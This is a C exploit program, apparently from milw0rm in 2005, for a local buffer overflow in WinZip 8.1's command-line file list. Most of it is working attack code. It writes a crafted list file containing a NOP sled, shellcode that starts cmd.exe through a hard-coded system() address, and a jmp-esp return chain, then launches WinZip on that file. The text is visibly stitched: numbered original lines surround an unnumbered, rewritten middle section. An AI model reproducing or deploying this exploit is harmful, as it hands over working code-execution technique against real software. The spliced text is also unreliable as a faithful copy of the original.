WinZIP 8.1 Command Line Local Buffer Overflow Exploit

  1   /*
  2   *
  3   * WinZip Command Line Local Buffer Overflow
  4   * http://securitytracker.com/alerts/2004/Sep/1011132.html
  5   * http://www.winzip.com/wz90sr1.htm
  6   * Exploit coded By ATmaCA
  7   * Web: atmacasoft.com && spyinstructors.com
  8   * E-Mail: atmaca@icqmail.com
  9   * Credit to kozan
 10   *
 11   */
 12
 13   /*
 14   *
 15   * Tested with WinZip 8.1 on Win XP Sp2 En
 16   * Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
 17   * http://www.winzip.com/wz90sr1.htm
 18   *
 19   */
 20
 21   #include <windows.h>
 22   #include <stdio.h>
 23
#define NOP 0x90 /* x86 one-byte NOP; main() writes a sled of these in front of the shellcode */
 25
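/*
 * Target paths. The crafted list file is created at TMP_PATH and handed to
 * WinZip through its "/@" switch. Both paths are joined into the command line
 * at compile time, so there is no runtime string building (the original used
 * unbounded strcpy/strcat into a fixed 300-byte buffer). The list path was
 * previously a local named "tmpfile", which shadowed stdio's tmpfile().
 */
#define TMP_PATH    "c:\\wzs45.tmp"
#define WINZIP_PATH "C:\\Program Files\\WINZIP\\winzip32.exe"

/* Number of NOP bytes written in front of the shellcode. */
enum { NOP_SLED_LEN = 384 };

/* Write n bytes from p to f. Returns 0 on success, -1 on a short write. */
static int put_bytes(FILE *f, const void *p, size_t n)
{
    return fwrite(p, 1, n, f) == n ? 0 : -1;
}

/* Write n copies of byte b to f. Returns 0 on success, -1 on error. */
static int put_fill(FILE *f, int b, size_t n)
{
    while (n-- > 0) {
        if (fputc(b, f) == EOF) {
            return -1;
        }
    }
    return 0;
}

/*
 * Build the crafted list file and launch WinZip on it.
 *
 * The list file holds one ordinary entry followed by a second entry that is
 * "c:\" plus a NOP sled, the shellcode and a return-address chain; presumably
 * that oversized entry overflows a fixed buffer in WinZip's list handling and
 * execution lands in the sled. Every address is hard-coded for WinZip 8.1 on
 * Windows XP SP2 English (see the header comment) and will not work on other
 * builds; the issue was fixed in WinZip 9.0 SR-1. The payload only starts a
 * local cmd.exe as the current user.
 *
 * Side effects: needs write access to the drive root, and leaves TMP_PATH on
 * disk (it is never deleted).
 *
 * Returns 0 on success, 1 if the list file could not be written or WinZip
 * could not be started.
 */
int main(void)
{
    /* First list entry: any .ext path; the file does not need to exist. */
    static const char inputfile[] = "C:\\someinputfile.ext\n";

    /* Launches a local cmd.exe through msvcrt's system() (WinXP SP2 address). */
    static const char shellcode[] =
        "\x55\x8B\xEC\x33\xFF"
        "\x57\x83\xEC\x04\xC6\x45\xF8"
        "\x63\xC6\x45\xF9\x6D\xC6\x45"
        "\xFA\x64\xC6\x45\xFB\x2E\xC6"
        "\x45\xFC\x65\xC6\x45\xFD\x78"
        "\xC6\x45\xFE\x65\xB8"
        "\xC7\x93\xC2\x77" /* 77C293C7 system() - WinXP SP2 - msvcrt.dll */
        "\x50\x8D\x45\xF8\x50"
        "\xFF\x55\xF4";

    /* Bytes that follow the shellcode on the overflowed line (original author's notes). */
    static const char ret_chain[] =
        "\xBF\xAC\xDA\x77"  /* EIP - WinXP SP2 Eng - jmp esp addr */
        "\x90\x90\x90\x90"  /* NOPs */
        "\x90\x83\xEC\x74"  /* sub esp,0x74 */
        "\xFF\xE4\x90\x90"; /* jmp esp */

    /*
     * WinZip command line. "-*" and "/zipandmail" are kept as published; "/@"
     * makes WinZip read its file list from TMP_PATH. The switch prefix is a
     * plain ASCII '-' (the published copy had a typographic minus, which is
     * not a valid switch character and does not compile in the sizeof math).
     */
    static const char cmdline[] = WINZIP_PATH " -* /zipandmail /@ " TMP_PATH;

    FILE *di = fopen(TMP_PATH, "wb");
    if (di == NULL) {
        perror("fopen " TMP_PATH);
        return 1;
    }

    /* Same byte sequence as the original fputc/fprintf calls, now checked. */
    int ok = put_bytes(di, inputfile, sizeof inputfile - 1) == 0
          && put_bytes(di, "c:\\", 3) == 0
          && put_fill(di, NOP, NOP_SLED_LEN) == 0
          && put_bytes(di, shellcode, sizeof shellcode - 1) == 0
          && put_bytes(di, ret_chain, sizeof ret_chain - 1) == 0
          && fputc('\n', di) != EOF;

    /* fclose() flushes buffered output; a failure means the file on disk is incomplete. */
    if (fclose(di) != 0) {
        perror("fclose " TMP_PATH);
        ok = 0;
    }
    if (!ok) {
        fputs("could not write " TMP_PATH "\n", stderr);
        return 1;
    }

    /* WinExec signals failure with a return value of 31 or less (Win32 API). */
    if (WinExec(cmdline, SW_SHOW) <= 31) {
        fputs("WinExec failed to start " WINZIP_PATH "\n", stderr);
        return 1;
    }
    return 0;
}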
 81
 82   // milw0rm.com [2005-06-07]



